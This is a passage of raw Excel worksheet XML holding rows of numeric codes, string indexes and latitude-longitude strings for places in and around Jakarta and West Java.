        <v>3976</v>
      </c>
      <c r="M1051">
        <v>3215032006</v>
      </c>
      <c r="N1051">
        <v>3215032</v>
      </c>
      <c r="O1051">
        <v>3215</v>
      </c>
      <c r="P1051">
        <v>32</v>
      </c>
      <c r="Q1051" t="s">
        <v>3977</v>
      </c>
      <c r="R1051" t="s">
        <v>3978</v>
      </c>
      <c r="S1051" t="s">
        <v>3979</v>
      </c>
      <c r="T1051" t="s">
        <v>42</v>
      </c>
      <c r="U1051" s="5">
        <v>10725448</v>
      </c>
      <c r="V1051" s="5" t="s">
        <v>15428</v>
      </c>
      <c r="W1051" s="5">
        <v>-632171</v>
      </c>
      <c r="X1051" t="s">
        <v>19215</v>
      </c>
      <c r="Y1051" t="str">
        <f t="shared" si="16"/>
        <v>-6.32171,107.25448</v>
      </c>
    </row>
    <row r="1052" spans="1:25" x14ac:dyDescent="0.25">
      <c r="B1052" s="1"/>
      <c r="L1052" t="s">
        <v>14427</v>
      </c>
      <c r="M1052">
        <v>3320030006</v>
      </c>
      <c r="N1052">
        <v>3320030</v>
      </c>
      <c r="O1052">
        <v>3320</v>
      </c>
      <c r="P1052">
        <v>33</v>
      </c>
      <c r="Q1052" t="s">
        <v>3954</v>
      </c>
      <c r="R1052" t="s">
        <v>3954</v>
      </c>
      <c r="S1052" t="s">
        <v>2976</v>
      </c>
      <c r="T1052" t="s">
        <v>1134</v>
      </c>
      <c r="U1052" s="5">
        <v>11071910</v>
      </c>
      <c r="V1052" s="5" t="s">
        <v>15429</v>
      </c>
      <c r="W1052" s="5">
        <v>-677892</v>
      </c>
      <c r="X1052" t="s">
        <v>19216</v>
      </c>
      <c r="Y1052" t="str">
        <f t="shared" si="16"/>
        <v>-6.77892,110.71910</v>
      </c>
    </row>
    <row r="1053" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1053">
        <v>108624</v>
      </c>
      <c r="B1053" s="1">
        <v>43885</v>
      </c>
      <c r="C1053">
        <v>1</v>
      </c>
      <c r="D1053" t="s">
        <v>22</v>
      </c>
      <c r="E1053" t="s">
        <v>23</v>
      </c>
      <c r="F1053" t="s">
        <v>3980</v>
      </c>
      <c r="H1053" t="s">
        <v>26</v>
      </c>
      <c r="I1053" t="s">
        <v>3981</v>
      </c>
      <c r="J1053" t="s">
        <v>2627</v>
      </c>
      <c r="L1053" t="s">
        <v>3982</v>
      </c>
      <c r="M1053">
        <v>3216061010</v>
      </c>
      <c r="N1053">
        <v>3216061</v>
      </c>
      <c r="O1053">
        <v>3216</v>
      </c>
      <c r="P1053">
        <v>32</v>
      </c>
      <c r="Q1053" t="s">
        <v>3983</v>
      </c>
      <c r="R1053" t="s">
        <v>55</v>
      </c>
      <c r="S1053" t="s">
        <v>41</v>
      </c>
      <c r="T1053" t="s">
        <v>42</v>
      </c>
      <c r="U1053" s="5">
        <v>10718116</v>
      </c>
      <c r="V1053" s="5" t="s">
        <v>15430</v>
      </c>
      <c r="W1053" s="5">
        <v>-625261</v>
      </c>
      <c r="X1053" t="s">
        <v>19217</v>
      </c>
      <c r="Y1053" t="str">
        <f t="shared" si="16"/>
        <v>-6.25261,107.18116</v>
      </c>
    </row>
    <row r="1054" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1054">
        <v>108625</v>
      </c>
      <c r="B1054" s="1">
        <v>43885</v>
      </c>
      <c r="C1054">
        <v>1</v>
      </c>
      <c r="D1054" t="s">
        <v>22</v>
      </c>
      <c r="E1054" t="s">
        <v>23</v>
      </c>
      <c r="F1054" t="s">
        <v>3984</v>
      </c>
      <c r="G1054" t="s">
        <v>3985</v>
      </c>
      <c r="H1054" t="s">
        <v>26</v>
      </c>
      <c r="I1054" t="s">
        <v>517</v>
      </c>
      <c r="J1054" t="s">
        <v>3135</v>
      </c>
      <c r="L1054" t="s">
        <v>3986</v>
      </c>
      <c r="M1054">
        <v>3603050003</v>
      </c>
      <c r="N1054">
        <v>3603050</v>
      </c>
      <c r="O1054">
        <v>3603</v>
      </c>
      <c r="P1054">
        <v>36</v>
      </c>
      <c r="Q1054" t="s">
        <v>3987</v>
      </c>
      <c r="R1054" t="s">
        <v>3988</v>
      </c>
      <c r="S1054" t="s">
        <v>201</v>
      </c>
      <c r="T1054" t="s">
        <v>171</v>
      </c>
      <c r="U1054" s="5">
        <v>10657732</v>
      </c>
      <c r="V1054" s="5" t="s">
        <v>15431</v>
      </c>
      <c r="W1054" s="5">
        <v>-625156</v>
      </c>
      <c r="X1054" t="s">
        <v>19218</v>
      </c>
      <c r="Y1054" t="str">
        <f t="shared" si="16"/>
        <v>-6.25156,106.57732</v>
      </c>
    </row>
    <row r="1055" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1055">
        <v>108626</v>
      </c>
      <c r="B1055" s="1">
        <v>43885</v>
      </c>
      <c r="C1055">
        <v>1</v>
      </c>
      <c r="D1055" t="s">
        <v>22</v>
      </c>
      <c r="E1055" t="s">
        <v>23</v>
      </c>
      <c r="F1055" t="s">
        <v>3989</v>
      </c>
      <c r="G1055" t="s">
        <v>3990</v>
      </c>
      <c r="H1055" t="s">
        <v>26</v>
      </c>
      <c r="I1055" t="s">
        <v>1263</v>
      </c>
      <c r="J1055" t="s">
        <v>3135</v>
      </c>
      <c r="L1055" t="s">
        <v>3991</v>
      </c>
      <c r="M1055">
        <v>3603050003</v>
      </c>
      <c r="N1055">
        <v>3603050</v>
      </c>
      <c r="O1055">
        <v>3603</v>
      </c>
      <c r="P1055">
        <v>36</v>
      </c>
      <c r="Q1055" t="s">
        <v>3987</v>
      </c>
      <c r="R1055" t="s">
        <v>3988</v>
      </c>
      <c r="S1055" t="s">
        <v>201</v>
      </c>
      <c r="T1055" t="s">
        <v>171</v>
      </c>
      <c r="U1055" s="5">
        <v>10657732</v>
      </c>
      <c r="V1055" s="5" t="s">
        <v>15431</v>
      </c>
      <c r="W1055" s="5">
        <v>-625153</v>
      </c>
      <c r="X1055" t="s">
        <v>19219</v>
      </c>
      <c r="Y1055" t="str">
        <f t="shared" si="16"/>
        <v>-6.25153,106.57732</v>
      </c>
    </row>
    <row r="1056" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1056">
        <v>108627</v>
      </c>
      <c r="B1056" s="1">
        <v>43885</v>
      </c>
      <c r="C1056">
        <v>1</v>
      </c>
      <c r="D1056" t="s">
        <v>22</v>
      </c>
      <c r="E1056" t="s">
        <v>23</v>
      </c>
      <c r="F1056" t="s">
        <v>3992</v>
      </c>
      <c r="G1056" t="s">
        <v>3993</v>
      </c>
      <c r="H1056" t="s">
        <v>26</v>
      </c>
      <c r="I1056" t="s">
        <v>443</v>
      </c>
      <c r="J1056" t="s">
        <v>3135</v>
      </c>
      <c r="L1056" t="s">
        <v>3994</v>
      </c>
      <c r="M1056">
        <v>3603050003</v>
      </c>
      <c r="N1056">
        <v>3603050</v>
      </c>
      <c r="O1056">
        <v>3603</v>
      </c>
      <c r="P1056">
        <v>36</v>
      </c>
      <c r="Q1056" t="s">
        <v>3987</v>
      </c>
      <c r="R1056" t="s">
        <v>3988</v>
      </c>
      <c r="S1056" t="s">
        <v>201</v>
      </c>
      <c r="T1056" t="s">
        <v>171</v>
      </c>
      <c r="U1056" s="5">
        <v>10657724</v>
      </c>
      <c r="V1056" s="5" t="s">
        <v>15432</v>
      </c>
      <c r="W1056" s="5">
        <v>-625170</v>
      </c>
      <c r="X1056" t="s">
        <v>19220</v>
      </c>
      <c r="Y1056" t="str">
        <f t="shared" si="16"/>
        <v>-6.25170,106.57724</v>
      </c>
    </row>
    <row r="1057" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1057">
        <v>108628</v>
      </c>
      <c r="B1057" s="1">
        <v>43885</v>
      </c>
      <c r="C1057">
        <v>1</v>
      </c>
      <c r="D1057" t="s">
        <v>22</v>
      </c>
      <c r="E1057" t="s">
        <v>23</v>
      </c>
      <c r="F1057" t="s">
        <v>3995</v>
      </c>
      <c r="G1057" t="s">
        <v>3996</v>
      </c>
      <c r="H1057" t="s">
        <v>26</v>
      </c>
      <c r="I1057" t="s">
        <v>193</v>
      </c>
      <c r="J1057" t="s">
        <v>3135</v>
      </c>
      <c r="L1057" t="s">
        <v>3997</v>
      </c>
      <c r="M1057">
        <v>3603051005</v>
      </c>
      <c r="N1057">
        <v>3603051</v>
      </c>
      <c r="O1057">
        <v>3603</v>
      </c>
      <c r="P1057">
        <v>36</v>
      </c>
      <c r="Q1057" t="s">
        <v>3998</v>
      </c>
      <c r="R1057" t="s">
        <v>257</v>
      </c>
      <c r="S1057" t="s">
        <v>201</v>
      </c>
      <c r="T1057" t="s">
        <v>171</v>
      </c>
      <c r="U1057" s="5">
        <v>10659440</v>
      </c>
      <c r="V1057" s="5" t="s">
        <v>15433</v>
      </c>
      <c r="W1057" s="5">
        <v>-621294</v>
      </c>
      <c r="X1057" t="s">
        <v>19221</v>
      </c>
      <c r="Y1057" t="str">
        <f t="shared" si="16"/>
        <v>-6.21294,106.59440</v>
      </c>
    </row>
    <row r="1058" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1058">
        <v>108629</v>
      </c>
      <c r="B1058" s="1">
        <v>43885</v>
      </c>
      <c r="C1058">
        <v>1</v>
      </c>
      <c r="D1058" t="s">
        <v>22</v>
      </c>
      <c r="E1058" t="s">
        <v>23</v>
      </c>
      <c r="F1058" t="s">
        <v>3999</v>
      </c>
      <c r="H1058" t="s">
        <v>26</v>
      </c>
      <c r="I1058" t="s">
        <v>555</v>
      </c>
      <c r="J1058" t="s">
        <v>4000</v>
      </c>
      <c r="L1058" t="s">
        <v>4001</v>
      </c>
      <c r="M1058">
        <v>3174080001</v>
      </c>
      <c r="N1058">
        <v>3174080</v>
      </c>
      <c r="O1058">
        <v>3174</v>
      </c>
      <c r="P1058">
        <v>31</v>
      </c>
      <c r="Q1058" t="s">
        <v>694</v>
      </c>
      <c r="R1058" t="s">
        <v>695</v>
      </c>
      <c r="S1058" t="s">
        <v>32</v>
      </c>
      <c r="T1058" t="s">
        <v>33</v>
      </c>
      <c r="U1058" s="5">
        <v>10669325</v>
      </c>
      <c r="V1058" s="5" t="s">
        <v>15434</v>
      </c>
      <c r="W1058" s="5">
        <v>-616521</v>
      </c>
      <c r="X1058" t="s">
        <v>19222</v>
      </c>
      <c r="Y1058" t="str">
        <f t="shared" si="16"/>
        <v>-6.16521,106.69325</v>
      </c>
    </row>
    <row r="1059" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1059">
        <v>108630</v>
      </c>
      <c r="B1059" s="1">
        <v>43885</v>
      </c>
      <c r="C1059">
        <v>1</v>
      </c>
      <c r="D1059" t="s">
        <v>22</v>
      </c>
      <c r="E1059" t="s">
        <v>23</v>
      </c>
      <c r="F1059" t="s">
        <v>4002</v>
      </c>
      <c r="G1059" t="s">
        <v>4003</v>
      </c>
      <c r="H1059" t="s">
        <v>26</v>
      </c>
      <c r="I1059" t="s">
        <v>945</v>
      </c>
      <c r="J1059" t="s">
        <v>3180</v>
      </c>
      <c r="L1059" t="s">
        <v>4004</v>
      </c>
      <c r="M1059">
        <v>3172060008</v>
      </c>
      <c r="N1059">
        <v>3172060</v>
      </c>
      <c r="O1059">
        <v>3172</v>
      </c>
      <c r="P1059">
        <v>31</v>
      </c>
      <c r="Q1059" t="s">
        <v>1096</v>
      </c>
      <c r="R1059" t="s">
        <v>48</v>
      </c>
      <c r="S1059" t="s">
        <v>49</v>
      </c>
      <c r="T1059" t="s">
        <v>33</v>
      </c>
      <c r="U1059" s="5">
        <v>10685769</v>
      </c>
      <c r="V1059" s="5" t="s">
        <v>15435</v>
      </c>
      <c r="W1059" s="5">
        <v>-621456</v>
      </c>
      <c r="X1059" t="s">
        <v>19223</v>
      </c>
      <c r="Y1059" t="str">
        <f t="shared" si="16"/>
        <v>-6.21456,106.85769</v>
      </c>
    </row>
    <row r="1060" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1060">
        <v>108631</v>
      </c>
      <c r="B1060" s="1">
        <v>43885</v>
      </c>
      <c r="C1060">
        <v>1</v>
      </c>
      <c r="D1060" t="s">
        <v>22</v>
      </c>
      <c r="E1060" t="s">
        <v>23</v>
      </c>
      <c r="F1060" t="s">
        <v>4005</v>
      </c>
      <c r="G1060" t="s">
        <v>4006</v>
      </c>
      <c r="H1060" t="s">
        <v>26</v>
      </c>
      <c r="I1060" t="s">
        <v>1651</v>
      </c>
      <c r="J1060" t="s">
        <v>1016</v>
      </c>
      <c r="L1060" t="s">
        <v>4007</v>
      </c>
      <c r="M1060">
        <v>3172060005</v>
      </c>
      <c r="N1060">
        <v>3172060</v>
      </c>
      <c r="O1060">
        <v>3172</v>
      </c>
      <c r="P1060">
        <v>31</v>
      </c>
      <c r="Q1060" t="s">
        <v>1019</v>
      </c>
      <c r="R1060" t="s">
        <v>48</v>
      </c>
      <c r="S1060" t="s">
        <v>49</v>
      </c>
      <c r="T1060" t="s">
        <v>33</v>
      </c>
      <c r="U1060" s="5">
        <v>10688049</v>
      </c>
      <c r="V1060" s="5" t="s">
        <v>15436</v>
      </c>
      <c r="W1060" s="5">
        <v>-621663</v>
      </c>
      <c r="X1060" t="s">
        <v>19224</v>
      </c>
      <c r="Y1060" t="str">
        <f t="shared" si="16"/>
        <v>-6.21663,106.88049</v>
      </c>
    </row>
    <row r="1061" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1061">
        <v>108632</v>
      </c>
      <c r="B1061" s="1">
        <v>43885</v>
      </c>
      <c r="C1061">
        <v>1</v>
      </c>
      <c r="D1061" t="s">
        <v>22</v>
      </c>
      <c r="E1061" t="s">
        <v>23</v>
      </c>
      <c r="F1061" t="s">
        <v>4008</v>
      </c>
      <c r="G1061" t="s">
        <v>4009</v>
      </c>
      <c r="H1061" t="s">
        <v>26</v>
      </c>
      <c r="I1061" t="s">
        <v>1909</v>
      </c>
      <c r="J1061" t="s">
        <v>2527</v>
      </c>
      <c r="L1061" t="s">
        <v>4010</v>
      </c>
      <c r="M1061">
        <v>3174030006</v>
      </c>
      <c r="N1061">
        <v>3174030</v>
      </c>
      <c r="O1061">
        <v>3174</v>
      </c>
      <c r="P1061">
        <v>31</v>
      </c>
      <c r="Q1061" t="s">
        <v>2529</v>
      </c>
      <c r="R1061" t="s">
        <v>1487</v>
      </c>
      <c r="S1061" t="s">
        <v>32</v>
      </c>
      <c r="T1061" t="s">
        <v>33</v>
      </c>
      <c r="U1061" s="5">
        <v>10680596</v>
      </c>
      <c r="V1061" s="5" t="s">
        <v>15232</v>
      </c>
      <c r="W1061" s="5">
        <v>-618028</v>
      </c>
      <c r="X1061" t="s">
        <v>19031</v>
      </c>
      <c r="Y1061" t="str">
        <f t="shared" si="16"/>
        <v>-6.18028,106.80596</v>
      </c>
    </row>
    <row r="1062" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1062">
        <v>108633</v>
      </c>
      <c r="B1062" s="1">
        <v>43885</v>
      </c>
      <c r="C1062">
        <v>1</v>
      </c>
      <c r="D1062" t="s">
        <v>22</v>
      </c>
      <c r="E1062" t="s">
        <v>23</v>
      </c>
      <c r="F1062" t="s">
        <v>4011</v>
      </c>
      <c r="G1062" t="s">
        <v>4012</v>
      </c>
      <c r="H1062" t="s">
        <v>26</v>
      </c>
      <c r="I1062" t="s">
        <v>784</v>
      </c>
      <c r="J1062" t="s">
        <v>4013</v>
      </c>
      <c r="M1062">
        <v>3172060008</v>
      </c>
      <c r="N1062">
        <v>3172060</v>
      </c>
      <c r="O1062">
        <v>3172</v>
      </c>
      <c r="P1062">
        <v>31</v>
      </c>
      <c r="Q1062" t="s">
        <v>1096</v>
      </c>
      <c r="R1062" t="s">
        <v>48</v>
      </c>
      <c r="S1062" t="s">
        <v>49</v>
      </c>
      <c r="T1062" t="s">
        <v>33</v>
      </c>
      <c r="U1062" s="5">
        <v>10685911</v>
      </c>
      <c r="V1062" s="5" t="s">
        <v>15437</v>
      </c>
      <c r="W1062" s="5">
        <v>-621610</v>
      </c>
      <c r="X1062" t="s">
        <v>19225</v>
      </c>
      <c r="Y1062" t="str">
        <f t="shared" si="16"/>
        <v>-6.21610,106.85911</v>
      </c>
    </row>
    <row r="1063" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1063">
        <v>108634</v>
      </c>
      <c r="B1063" s="1">
        <v>43885</v>
      </c>
      <c r="C1063">
        <v>1</v>
      </c>
      <c r="D1063" t="s">
        <v>22</v>
      </c>
      <c r="E1063" t="s">
        <v>23</v>
      </c>
      <c r="F1063" t="s">
        <v>4014</v>
      </c>
      <c r="G1063" t="s">
        <v>4015</v>
      </c>
      <c r="H1063" t="s">
        <v>26</v>
      </c>
      <c r="I1063" t="s">
        <v>2962</v>
      </c>
      <c r="J1063" t="s">
        <v>4016</v>
      </c>
      <c r="L1063" t="s">
        <v>4017</v>
      </c>
      <c r="M1063">
        <v>3175060003</v>
      </c>
      <c r="N1063">
        <v>3175060</v>
      </c>
      <c r="O1063">
        <v>3175</v>
      </c>
      <c r="P1063">
        <v>31</v>
      </c>
      <c r="Q1063" t="s">
        <v>4018</v>
      </c>
      <c r="R1063" t="s">
        <v>2279</v>
      </c>
      <c r="S1063" t="s">
        <v>547</v>
      </c>
      <c r="T1063" t="s">
        <v>33</v>
      </c>
      <c r="U1063" s="5">
        <v>10695780</v>
      </c>
      <c r="V1063" s="5" t="s">
        <v>15438</v>
      </c>
      <c r="W1063" s="5">
        <v>-612794</v>
      </c>
      <c r="X1063" t="s">
        <v>19226</v>
      </c>
      <c r="Y1063" t="str">
        <f t="shared" si="16"/>
        <v>-6.12794,106.95780</v>
      </c>
    </row>
    <row r="1064" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1064">
        <v>108635</v>
      </c>
      <c r="B1064" s="1">
        <v>43885</v>
      </c>
      <c r="C1064">
        <v>1</v>
      </c>
      <c r="D1064" t="s">
        <v>22</v>
      </c>
      <c r="E1064" t="s">
        <v>23</v>
      </c>
      <c r="F1064" t="s">
        <v>4019</v>
      </c>
      <c r="H1064" t="s">
        <v>26</v>
      </c>
      <c r="I1064" t="s">
        <v>1633</v>
      </c>
      <c r="J1064" t="s">
        <v>4020</v>
      </c>
      <c r="L1064" t="s">
        <v>4021</v>
      </c>
      <c r="M1064">
        <v>3172050004</v>
      </c>
      <c r="N1064">
        <v>3172050</v>
      </c>
      <c r="O1064">
        <v>3172</v>
      </c>
      <c r="P1064">
        <v>31</v>
      </c>
      <c r="Q1064" t="s">
        <v>2717</v>
      </c>
      <c r="R1064" t="s">
        <v>358</v>
      </c>
      <c r="S1064" t="s">
        <v>49</v>
      </c>
      <c r="T1064" t="s">
        <v>33</v>
      </c>
      <c r="U1064" s="5">
        <v>10687607</v>
      </c>
      <c r="V1064" s="5" t="s">
        <v>15439</v>
      </c>
      <c r="W1064" s="5">
        <v>-629529</v>
      </c>
      <c r="X1064" t="s">
        <v>19227</v>
      </c>
      <c r="Y1064" t="str">
        <f t="shared" si="16"/>
        <v>-6.29529,106.87607</v>
      </c>
    </row>
    <row r="1065" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1065">
        <v>108636</v>
      </c>
      <c r="B1065" s="1">
        <v>43885</v>
      </c>
      <c r="C1065">
        <v>1</v>
      </c>
      <c r="D1065" t="s">
        <v>22</v>
      </c>
      <c r="E1065" t="s">
        <v>23</v>
      </c>
      <c r="F1065" t="s">
        <v>4022</v>
      </c>
      <c r="G1065" t="s">
        <v>4023</v>
      </c>
      <c r="H1065" t="s">
        <v>26</v>
      </c>
      <c r="I1065" t="s">
        <v>76</v>
      </c>
      <c r="J1065" t="s">
        <v>2627</v>
      </c>
      <c r="L1065" t="s">
        <v>3563</v>
      </c>
      <c r="M1065">
        <v>3275020006</v>
      </c>
      <c r="N1065">
        <v>3275020</v>
      </c>
      <c r="O1065">
        <v>3275</v>
      </c>
      <c r="P1065">
        <v>32</v>
      </c>
      <c r="Q1065" t="s">
        <v>4024</v>
      </c>
      <c r="R1065" t="s">
        <v>828</v>
      </c>
      <c r="S1065" t="s">
        <v>41</v>
      </c>
      <c r="T1065" t="s">
        <v>42</v>
      </c>
      <c r="U1065" s="5">
        <v>10694537</v>
      </c>
      <c r="V1065" s="5" t="s">
        <v>15440</v>
      </c>
      <c r="W1065" s="5">
        <v>-628413</v>
      </c>
      <c r="X1065" t="s">
        <v>19228</v>
      </c>
      <c r="Y1065" t="str">
        <f t="shared" si="16"/>
        <v>-6.28413,106.94537</v>
      </c>
    </row>
    <row r="1066" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1066">
        <v>108637</v>
      </c>
      <c r="B1066" s="1">
        <v>43885</v>
      </c>
      <c r="C1066">
        <v>1</v>
      </c>
      <c r="D1066" t="s">
        <v>22</v>
      </c>
      <c r="E1066" t="s">
        <v>23</v>
      </c>
      <c r="F1066" t="s">
        <v>4025</v>
      </c>
      <c r="G1066" t="s">
        <v>4026</v>
      </c>
      <c r="H1066" t="s">
        <v>26</v>
      </c>
      <c r="I1066" t="s">
        <v>1689</v>
      </c>
      <c r="J1066" t="s">
        <v>4027</v>
      </c>
      <c r="M1066">
        <v>3174020007</v>
      </c>
      <c r="N1066">
        <v>3174020</v>
      </c>
      <c r="O1066">
        <v>3174</v>
      </c>
      <c r="P1066">
        <v>31</v>
      </c>
      <c r="Q1066" t="s">
        <v>95</v>
      </c>
      <c r="R1066" t="s">
        <v>31</v>
      </c>
      <c r="S1066" t="s">
        <v>32</v>
      </c>
      <c r="T1066" t="s">
        <v>33</v>
      </c>
      <c r="U1066" s="5">
        <v>10675867</v>
      </c>
      <c r="V1066" s="5" t="s">
        <v>15441</v>
      </c>
      <c r="W1066" s="5">
        <v>-616716</v>
      </c>
      <c r="X1066" t="s">
        <v>19229</v>
      </c>
      <c r="Y1066" t="str">
        <f t="shared" si="16"/>
        <v>-6.16716,106.75867</v>
      </c>
    </row>
    <row r="1067" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1067">
        <v>108638</v>
      </c>
      <c r="B1067" s="1">
        <v>43885</v>
      </c>
      <c r="C1067">
        <v>1</v>
      </c>
      <c r="D1067" t="s">
        <v>22</v>
      </c>
      <c r="E1067" t="s">
        <v>23</v>
      </c>
      <c r="F1067" t="s">
        <v>4028</v>
      </c>
      <c r="G1067" t="s">
        <v>4029</v>
      </c>
      <c r="H1067" t="s">
        <v>26</v>
      </c>
      <c r="I1067" t="s">
        <v>862</v>
      </c>
      <c r="J1067" t="s">
        <v>2627</v>
      </c>
      <c r="L1067" t="s">
        <v>4030</v>
      </c>
      <c r="M1067">
        <v>3275010008</v>
      </c>
      <c r="N1067">
        <v>3275010</v>
      </c>
      <c r="O1067">
        <v>3275</v>
      </c>
      <c r="P1067">
        <v>32</v>
      </c>
      <c r="Q1067" t="s">
        <v>2236</v>
      </c>
      <c r="R1067" t="s">
        <v>287</v>
      </c>
      <c r="S1067" t="s">
        <v>41</v>
      </c>
      <c r="T1067" t="s">
        <v>42</v>
      </c>
      <c r="U1067" s="5">
        <v>10693654</v>
      </c>
      <c r="V1067" s="5" t="s">
        <v>15442</v>
      </c>
      <c r="W1067" s="5">
        <v>-628132</v>
      </c>
      <c r="X1067" t="s">
        <v>19230</v>
      </c>
      <c r="Y1067" t="str">
        <f t="shared" si="16"/>
        <v>-6.28132,106.93654</v>
      </c>
    </row>
    <row r="1068" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1068">
        <v>108639</v>
      </c>
      <c r="B1068" s="1">
        <v>43885</v>
      </c>
      <c r="C1068">
        <v>1</v>
      </c>
      <c r="D1068" t="s">
        <v>22</v>
      </c>
      <c r="E1068" t="s">
        <v>23</v>
      </c>
      <c r="F1068" t="s">
        <v>4031</v>
      </c>
      <c r="G1068" t="s">
        <v>4032</v>
      </c>
      <c r="H1068" t="s">
        <v>26</v>
      </c>
      <c r="I1068" t="s">
        <v>1253</v>
      </c>
      <c r="J1068" t="s">
        <v>2919</v>
      </c>
      <c r="L1068" t="s">
        <v>4033</v>
      </c>
      <c r="M1068">
        <v>3172090004</v>
      </c>
      <c r="N1068">
        <v>3172090</v>
      </c>
      <c r="O1068">
        <v>3172</v>
      </c>
      <c r="P1068">
        <v>31</v>
      </c>
      <c r="Q1068" t="s">
        <v>889</v>
      </c>
      <c r="R1068" t="s">
        <v>890</v>
      </c>
      <c r="S1068" t="s">
        <v>49</v>
      </c>
      <c r="T1068" t="s">
        <v>33</v>
      </c>
      <c r="U1068" s="5">
        <v>10689757</v>
      </c>
      <c r="V1068" s="5" t="s">
        <v>15443</v>
      </c>
      <c r="W1068" s="5">
        <v>-619981</v>
      </c>
      <c r="X1068" t="s">
        <v>19231</v>
      </c>
      <c r="Y1068" t="str">
        <f t="shared" si="16"/>
        <v>-6.19981,106.89757</v>
      </c>
    </row>
    <row r="1069" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1069">
        <v>108640</v>
      </c>
      <c r="B1069" s="1">
        <v>43885</v>
      </c>
      <c r="C1069">
        <v>1</v>
      </c>
      <c r="D1069" t="s">
        <v>22</v>
      </c>
      <c r="E1069" t="s">
        <v>23</v>
      </c>
      <c r="F1069" t="s">
        <v>4034</v>
      </c>
      <c r="G1069" t="s">
        <v>4035</v>
      </c>
      <c r="H1069" t="s">
        <v>26</v>
      </c>
      <c r="I1069" t="s">
        <v>1991</v>
      </c>
      <c r="J1069" t="s">
        <v>4036</v>
      </c>
      <c r="L1069" t="s">
        <v>4037</v>
      </c>
      <c r="M1069">
        <v>3173040003</v>
      </c>
      <c r="N1069">
        <v>3173040</v>
      </c>
      <c r="O1069">
        <v>3173</v>
      </c>
      <c r="P1069">
        <v>31</v>
      </c>
      <c r="Q1069" t="s">
        <v>2346</v>
      </c>
      <c r="R1069" t="s">
        <v>1598</v>
      </c>
      <c r="S1069" t="s">
        <v>62</v>
      </c>
      <c r="T1069" t="s">
        <v>33</v>
      </c>
      <c r="U1069" s="5">
        <v>10685157</v>
      </c>
      <c r="V1069" s="5" t="s">
        <v>15444</v>
      </c>
      <c r="W1069" s="5">
        <v>-618068</v>
      </c>
      <c r="X1069" t="s">
        <v>19232</v>
      </c>
      <c r="Y1069" t="str">
        <f t="shared" si="16"/>
        <v>-6.18068,106.85157</v>
      </c>
    </row>
    <row r="1070" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1070">
        <v>108641</v>
      </c>
      <c r="B1070" s="1">
        <v>43885</v>
      </c>
      <c r="C1070">
        <v>1</v>
      </c>
      <c r="D1070" t="s">
        <v>22</v>
      </c>
      <c r="E1070" t="s">
        <v>23</v>
      </c>
      <c r="F1070" t="s">
        <v>4038</v>
      </c>
      <c r="H1070" t="s">
        <v>26</v>
      </c>
      <c r="I1070" t="s">
        <v>788</v>
      </c>
      <c r="J1070" t="s">
        <v>3135</v>
      </c>
      <c r="L1070" t="s">
        <v>4039</v>
      </c>
      <c r="M1070">
        <v>3674060003</v>
      </c>
      <c r="N1070">
        <v>3674060</v>
      </c>
      <c r="O1070">
        <v>3674</v>
      </c>
      <c r="P1070">
        <v>36</v>
      </c>
      <c r="Q1070" t="s">
        <v>205</v>
      </c>
      <c r="R1070" t="s">
        <v>169</v>
      </c>
      <c r="S1070" t="s">
        <v>170</v>
      </c>
      <c r="T1070" t="s">
        <v>171</v>
      </c>
      <c r="U1070" s="5">
        <v>10670207</v>
      </c>
      <c r="V1070" s="5" t="s">
        <v>15445</v>
      </c>
      <c r="W1070" s="5">
        <v>-626183</v>
      </c>
      <c r="X1070" t="s">
        <v>19233</v>
      </c>
      <c r="Y1070" t="str">
        <f t="shared" si="16"/>
        <v>-6.26183,106.70207</v>
      </c>
    </row>
    <row r="1071" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1071">
        <v>108642</v>
      </c>
      <c r="B1071" s="1">
        <v>43885</v>
      </c>
      <c r="C1071">
        <v>1</v>
      </c>
      <c r="D1071" t="s">
        <v>22</v>
      </c>
      <c r="E1071" t="s">
        <v>23</v>
      </c>
      <c r="F1071" t="s">
        <v>4040</v>
      </c>
      <c r="H1071" t="s">
        <v>26</v>
      </c>
      <c r="I1071" t="s">
        <v>882</v>
      </c>
      <c r="J1071" t="s">
        <v>3157</v>
      </c>
      <c r="L1071" t="s">
        <v>4041</v>
      </c>
      <c r="M1071">
        <v>3172070001</v>
      </c>
      <c r="N1071">
        <v>3172070</v>
      </c>
      <c r="O1071">
        <v>3172</v>
      </c>
      <c r="P1071">
        <v>31</v>
      </c>
      <c r="Q1071" t="s">
        <v>127</v>
      </c>
      <c r="R1071" t="s">
        <v>128</v>
      </c>
      <c r="S1071" t="s">
        <v>49</v>
      </c>
      <c r="T1071" t="s">
        <v>33</v>
      </c>
      <c r="U1071" s="5">
        <v>10689353</v>
      </c>
      <c r="V1071" s="5" t="s">
        <v>15446</v>
      </c>
      <c r="W1071" s="5">
        <v>-623487</v>
      </c>
      <c r="X1071" t="s">
        <v>19234</v>
      </c>
      <c r="Y1071" t="str">
        <f t="shared" si="16"/>
        <v>-6.23487,106.89353</v>
      </c>
    </row>
    <row r="1072" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1072">
        <v>108643</v>
      </c>
      <c r="B1072" s="1">
        <v>43885</v>
      </c>
      <c r="C1072">
        <v>1</v>
      </c>
      <c r="D1072" t="s">
        <v>22</v>
      </c>
      <c r="E1072" t="s">
        <v>23</v>
      </c>
      <c r="F1072" t="s">
        <v>4042</v>
      </c>
      <c r="G1072" t="s">
        <v>4043</v>
      </c>
      <c r="H1072" t="s">
        <v>26</v>
      </c>
      <c r="I1072" t="s">
        <v>1651</v>
      </c>
      <c r="J1072" t="s">
        <v>3135</v>
      </c>
      <c r="L1072" t="s">
        <v>4044</v>
      </c>
      <c r="M1072">
        <v>3671021007</v>
      </c>
      <c r="N1072">
